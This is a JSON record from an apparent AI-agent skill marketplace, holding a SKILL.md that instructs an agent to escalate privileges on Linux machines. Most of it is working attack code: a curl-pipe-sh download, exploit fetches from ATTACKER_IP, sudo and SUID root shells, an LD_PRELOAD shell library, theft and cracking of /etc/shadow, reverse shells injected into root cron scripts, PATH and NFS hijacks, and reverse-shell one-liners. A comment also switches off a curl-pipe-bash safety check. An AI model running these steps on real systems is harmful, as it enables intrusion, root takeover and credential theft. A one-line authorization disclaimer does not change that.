[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-a3710919-48e5-43b6-b657-03af4207d6dd":3,"$fOy4rGAXB4x09q6AlioqHorn4j-8F8uDdnvQ3cM2QME4":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"a3710919-48e5-43b6-b657-03af4207d6dd","linux-privilege-escalation","对Linux系统进行系统性的权限提升评估，以识别和利用配置错误、易受攻击的服务和安全漏洞，从而从低权限用户访问提升到root级别控制。","cat_design_ui","mod_design","sickn33,design","---\nname: linux-privilege-escalation\ndescription: \"Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n\u003C!-- security-allowlist: curl-pipe-bash -->\n\n# Linux Privilege Escalation\n\n## Purpose\n\nExecute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.\n\n## Inputs \u002F Prerequisites\n\n### Required Access\n- Low-privilege shell access to target Linux system\n- Ability to execute commands (interactive or semi-interactive shell)\n- Network access for reverse shell connections (if needed)\n- Attacker machine for payload hosting and receiving shells\n\n### Technical Requirements\n- Understanding of Linux filesystem permissions and ownership\n- Familiarity with common Linux utilities and scripting\n- Knowledge of kernel versions and associated vulnerabilities\n- Basic understanding of compilation (gcc) for custom exploits\n\n### Recommended Tools\n- LinPEAS, LinEnum, or Linux Smart Enumeration scripts\n- Linux Exploit Suggester (LES)\n- GTFOBins reference for binary exploitation\n- John the Ripper or Hashcat for password cracking\n- Netcat or similar for reverse shells\n\n## Outputs \u002F Deliverables\n\n### Primary Outputs\n- Root shell access on target system\n- Privilege escalation path documentation\n- System enumeration findings report\n- Recommendations for remediation\n\n### Evidence Artifacts\n- Screenshots of successful privilege escalation\n- Command output logs demonstrating root access\n- Identified vulnerability details\n- Exploited configuration files\n\n## Core Workflow\n\n### Phase 1: System Enumeration\n\n#### Basic System Information\nGather fundamental system details for vulnerability research:\n\n```bash\n# Hostname and system role\nhostname\n\n# Kernel version and architecture\nuname -a\n\n# Detailed kernel information\ncat \u002Fproc\u002Fversion\n\n# Operating system details\ncat \u002Fetc\u002Fissue\ncat \u002Fetc\u002F*-release\n\n# Architecture\narch\n```\n\n#### User and Permission Enumeration\n\n```bash\n# Current user context\nwhoami\nid\n\n# Users with login shells\ncat \u002Fetc\u002Fpasswd | grep -v nologin | grep -v false\n\n# Users with home directories\ncat \u002Fetc\u002Fpasswd | grep home\n\n# Group memberships\ngroups\n\n# Other logged-in users\nw\nwho\n```\n\n#### Network Information\n\n```bash\n# Network interfaces\nifconfig\nip addr\n\n# Routing table\nip route\n\n# Active connections\nnetstat -antup\nss -tulpn\n\n# Listening services\nnetstat -l\n```\n\n#### Process and Service Enumeration\n\n```bash\n# All running processes\nps aux\nps -ef\n\n# Process tree view\nps axjf\n\n# Services running as root\nps aux | grep root\n```\n\n#### Environment Variables\n\n```bash\n# Full environment\nenv\n\n# PATH variable (for hijacking)\necho $PATH\n```\n\n### Phase 2: Automated Enumeration\n\nDeploy automated scripts for comprehensive enumeration:\n\n```bash\n# LinPEAS\ncurl -L https:\u002F\u002Fgithub.com\u002Fcarlospolop\u002FPEASS-ng\u002Freleases\u002Flatest\u002Fdownload\u002Flinpeas.sh | sh\n\n# LinEnum\n.\u002FLinEnum.sh -t\n\n# Linux Smart Enumeration\n.\u002Flse.sh -l 1\n\n# Linux Exploit Suggester\n.\u002Fles.sh\n```\n\nTransfer scripts to target system:\n\n```bash\n# On attacker machine\npython3 -m http.server 8000\n\n# On target machine\nwget http:\u002F\u002FATTACKER_IP:8000\u002Flinpeas.sh\nchmod +x linpeas.sh\n.\u002Flinpeas.sh\n```\n\n### Phase 3: Kernel Exploits\n\n#### Identify Kernel Version\n\n```bash\nuname -r\ncat \u002Fproc\u002Fversion\n```\n\n#### Search for Exploits\n\n```bash\n# Use Linux Exploit Suggester\n.\u002Flinux-exploit-suggester.sh\n\n# Manual search on exploit-db\nsearchsploit linux kernel [version]\n```\n\n#### Common Kernel Exploits\n\n| Kernel Version | Exploit | CVE |\n|---------------|---------|-----|\n| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |\n| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |\n| 5.8+ | Dirty Pipe | CVE-2022-0847 |\n\n#### Compile and Execute\n\n```bash\n# Transfer exploit source\nwget http:\u002F\u002FATTACKER_IP\u002Fexploit.c\n\n# Compile on target\ngcc exploit.c -o exploit\n\n# Execute\n.\u002Fexploit\n```\n\n### Phase 4: Sudo Exploitation\n\n#### Enumerate Sudo Privileges\n\n```bash\nsudo -l\n```\n\n#### GTFOBins Sudo Exploitation\nReference https:\u002F\u002Fgtfobins.github.io for exploitation commands:\n\n```bash\n# Example: vim with sudo\nsudo vim -c ':!\u002Fbin\u002Fbash'\n\n# Example: find with sudo\nsudo find . -exec \u002Fbin\u002Fsh \\; -quit\n\n# Example: awk with sudo\nsudo awk 'BEGIN {system(\"\u002Fbin\u002Fbash\")}'\n\n# Example: python with sudo\nsudo python -c 'import os; os.system(\"\u002Fbin\u002Fbash\")'\n\n# Example: less with sudo\nsudo less \u002Fetc\u002Fpasswd\n!\u002Fbin\u002Fbash\n```\n\n#### LD_PRELOAD Exploitation\nWhen env_keep includes LD_PRELOAD:\n\n```c\n\u002F\u002F shell.c\n#include \u003Cstdio.h>\n#include \u003Csys\u002Ftypes.h>\n#include \u003Cstdlib.h>\n\nvoid _init() {\n    unsetenv(\"LD_PRELOAD\");\n    setgid(0);\n    setuid(0);\n    system(\"\u002Fbin\u002Fbash\");\n}\n```\n\n```bash\n# Compile shared library\ngcc -fPIC -shared -o shell.so shell.c -nostartfiles\n\n# Execute with sudo\nsudo LD_PRELOAD=\u002Ftmp\u002Fshell.so find\n```\n\n### Phase 5: SUID Binary Exploitation\n\n#### Find SUID Binaries\n\n```bash\nfind \u002F -type f -perm -04000 -ls 2>\u002Fdev\u002Fnull\nfind \u002F -perm -u=s -type f 2>\u002Fdev\u002Fnull\n```\n\n#### Exploit SUID Binaries\nReference GTFOBins for SUID exploitation:\n\n```bash\n# Example: base64 for file reading\nLFILE=\u002Fetc\u002Fshadow\nbase64 \"$LFILE\" | base64 -d\n\n# Example: cp for file writing\ncp \u002Fbin\u002Fbash \u002Ftmp\u002Fbash\nchmod +s \u002Ftmp\u002Fbash\n\u002Ftmp\u002Fbash -p\n\n# Example: find with SUID\nfind . -exec \u002Fbin\u002Fsh -p \\; -quit\n```\n\n#### Password Cracking via SUID\n\n```bash\n# Read shadow file (if base64 has SUID)\nbase64 \u002Fetc\u002Fshadow | base64 -d > shadow.txt\nbase64 \u002Fetc\u002Fpasswd | base64 -d > passwd.txt\n\n# On attacker machine\nunshadow passwd.txt shadow.txt > hashes.txt\njohn --wordlist=\u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt hashes.txt\n```\n\n#### Add User to passwd (if nano\u002Fvim has SUID)\n\n```bash\n# Generate password hash\nopenssl passwd -1 -salt new newpassword\n\n# Add to \u002Fetc\u002Fpasswd (using SUID editor)\nnewuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:\u002Froot:\u002Fbin\u002Fbash\n```\n\n### Phase 6: Capabilities Exploitation\n\n#### Enumerate Capabilities\n\n```bash\ngetcap -r \u002F 2>\u002Fdev\u002Fnull\n```\n\n#### Exploit Capabilities\n\n```bash\n# Example: python with cap_setuid\n\u002Fusr\u002Fbin\u002Fpython3 -c 'import os; os.setuid(0); os.system(\"\u002Fbin\u002Fbash\")'\n\n# Example: vim with cap_setuid\n.\u002Fvim -c ':py3 import os; os.setuid(0); os.execl(\"\u002Fbin\u002Fbash\", \"bash\", \"-c\", \"reset; exec bash\")'\n\n# Example: perl with cap_setuid\nperl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"\u002Fbin\u002Fbash\";'\n```\n\n### Phase 7: Cron Job Exploitation\n\n#### Enumerate Cron Jobs\n\n```bash\n# System crontab\ncat \u002Fetc\u002Fcrontab\n\n# User crontabs\nls -la \u002Fvar\u002Fspool\u002Fcron\u002Fcrontabs\u002F\n\n# Cron directories\nls -la \u002Fetc\u002Fcron.*\n\n# Systemd timers\nsystemctl list-timers\n```\n\n#### Exploit Writable Cron Scripts\n\n```bash\n# Identify writable cron script from \u002Fetc\u002Fcrontab\nls -la \u002Fopt\u002Fbackup.sh        # Check permissions\necho 'bash -i >& \u002Fdev\u002Ftcp\u002FATTACKER_IP\u002F4444 0>&1' >> \u002Fopt\u002Fbackup.sh\n\n# If cron references non-existent script in writable PATH\necho -e '#!\u002Fbin\u002Fbash\\nbash -i >& \u002Fdev\u002Ftcp\u002FATTACKER_IP\u002F4444 0>&1' > \u002Fhome\u002Fuser\u002Fantivirus.sh\nchmod +x \u002Fhome\u002Fuser\u002Fantivirus.sh\n```\n\n### Phase 8: PATH Hijacking\n\n```bash\n# Find SUID binary calling external command\nstrings \u002Fusr\u002Flocal\u002Fbin\u002Fsuid-binary\n# Shows: system(\"service apache2 start\")\n\n# Hijack by creating malicious binary in writable PATH\nexport PATH=\u002Ftmp:$PATH\necho -e '#!\u002Fbin\u002Fbash\\n\u002Fbin\u002Fbash -p' > \u002Ftmp\u002Fservice\nchmod +x \u002Ftmp\u002Fservice\n\u002Fusr\u002Flocal\u002Fbin\u002Fsuid-binary      # Execute SUID binary\n```\n\n### Phase 9: NFS Exploitation\n\n```bash\n# On target - look for no_root_squash option\ncat \u002Fetc\u002Fexports\n\n# On attacker - mount share and create SUID binary\nshowmount -e TARGET_IP\nmount -o rw TARGET_IP:\u002Fshare \u002Ftmp\u002Fnfs\n\n# Create and compile SUID shell\necho 'int main(){setuid(0);setgid(0);system(\"\u002Fbin\u002Fbash\");return 0;}' > \u002Ftmp\u002Fnfs\u002Fshell.c\ngcc \u002Ftmp\u002Fnfs\u002Fshell.c -o \u002Ftmp\u002Fnfs\u002Fshell && chmod +s \u002Ftmp\u002Fnfs\u002Fshell\n\n# On target - execute\n\u002Fshare\u002Fshell\n```\n\n## Quick Reference\n\n### Enumeration Commands Summary\n| Purpose | Command |\n|---------|---------|\n| Kernel version | `uname -a` |\n| Current user | `id` |\n| Sudo rights | `sudo -l` |\n| SUID files | `find \u002F -perm -u=s -type f 2>\u002Fdev\u002Fnull` |\n| Capabilities | `getcap -r \u002F 2>\u002Fdev\u002Fnull` |\n| Cron jobs | `cat \u002Fetc\u002Fcrontab` |\n| Writable dirs | `find \u002F -writable -type d 2>\u002Fdev\u002Fnull` |\n| NFS exports | `cat \u002Fetc\u002Fexports` |\n\n### Reverse Shell One-Liners\n```bash\n# Bash\nbash -i >& \u002Fdev\u002Ftcp\u002FATTACKER_IP\u002F4444 0>&1\n\n# Python\npython -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"\u002Fbin\u002Fbash\",\"-i\"])'\n\n# Netcat\nnc -e \u002Fbin\u002Fbash ATTACKER_IP 4444\n\n# Perl\nperl -e 'use Socket;$i=\"ATTACKER_IP\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"\u002Fbin\u002Fbash -i\");'\n```\n\n### Key Resources\n- GTFOBins: https:\u002F\u002Fgtfobins.github.io\n- LinPEAS: https:\u002F\u002Fgithub.com\u002Fcarlospolop\u002FPEASS-ng\n- Linux Exploit Suggester: https:\u002F\u002Fgithub.com\u002Fmzet-\u002Flinux-exploit-suggester\n\n## Constraints and Guardrails\n\n### Operational Boundaries\n- Verify kernel exploits in test environment before production use\n- Failed kernel exploits may crash the system\n- Document all changes made during privilege escalation\n- Maintain access persistence only as authorized\n\n### Technical Limitations\n- Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)\n- AppArmor\u002FSELinux may restrict exploitation techniques\n- Container environments limit kernel-level exploits\n- Hardened systems may have restricted sudo configurations\n\n### Legal and Ethical Requirements\n- Written authorization required before testing\n- Stay within defined scope boundaries\n- Report critical findings immediately\n- Do not access data beyond scope requirements\n\n## Examples\n\n### Example 1: Sudo to Root via find\n\n**Scenario**: User has sudo rights for find command\n\n```bash\n$ sudo -l\nUser user may run the following commands:\n    (root) NOPASSWD: \u002Fusr\u002Fbin\u002Ffind\n\n$ sudo find . -exec \u002Fbin\u002Fbash \\; -quit\n# id\nuid=0(root) gid=0(root) groups=0(root)\n```\n\n### Example 2: SUID base64 for Shadow Access\n\n**Scenario**: base64 binary has SUID bit set\n\n```bash\n$ find \u002F -perm -u=s -type f 2>\u002Fdev\u002Fnull | grep base64\n\u002Fusr\u002Fbin\u002Fbase64\n\n$ base64 \u002Fetc\u002Fshadow | base64 -d\nroot:$6$xyz...:18000:0:99999:7:::\n\n# Crack offline with john\n$ john --wordlist=rockyou.txt shadow.txt\n```\n\n### Example 3: Cron Job Script Hijacking\n\n**Scenario**: Root cron job executes writable script\n\n```bash\n$ cat \u002Fetc\u002Fcrontab\n* * * * * root \u002Fopt\u002Fscripts\u002Fbackup.sh\n\n$ ls -la \u002Fopt\u002Fscripts\u002Fbackup.sh\n-rwxrwxrwx 1 root root 50 \u002Fopt\u002Fscripts\u002Fbackup.sh\n\n$ echo 'cp \u002Fbin\u002Fbash \u002Ftmp\u002Fbash; chmod +s \u002Ftmp\u002Fbash' >> \u002Fopt\u002Fscripts\u002Fbackup.sh\n\n# Wait 1 minute\n$ \u002Ftmp\u002Fbash -p\n# id\nuid=1000(user) gid=1000(user) euid=0(root)\n```\n\n## Troubleshooting\n\n| Issue | Solutions |\n|-------|-----------|\n| Exploit compilation fails | Check for gcc: `which gcc`; compile on attacker for same arch; use `gcc -static` |\n| Reverse shell not connecting | Check firewall; try ports 443\u002F80; use staged payloads; check egress filtering |\n| SUID binary not exploitable | Verify version matches GTFOBins; check AppArmor\u002FSELinux; some binaries drop privileges |\n| Cron job not executing | Verify cron running: `service cron status`; check +x permissions; verify PATH in crontab |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,246,1950,"2026-05-16 13:26:41",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"设计创意","design","mdi-palette-outline","UI 设计、生成艺术、品牌视觉等创意 Skill",3,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"UI 设计","ui-design","mdi-monitor-cellphone","界面设计、交互规范、设计系统",1,36,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"b3dea010-9db8-41b7-a230-92925c73b7f6","1.0.0","linux-privilege-escalation.zip",4700,"uploads\u002Fskills\u002Fa3710919-48e5-43b6-b657-03af4207d6dd\u002Flinux-privilege-escalation.zip","9edb6ca8fe62c5d9587253ad37d7406496bcf79c22236e6ed770912808584e35","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":11857}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]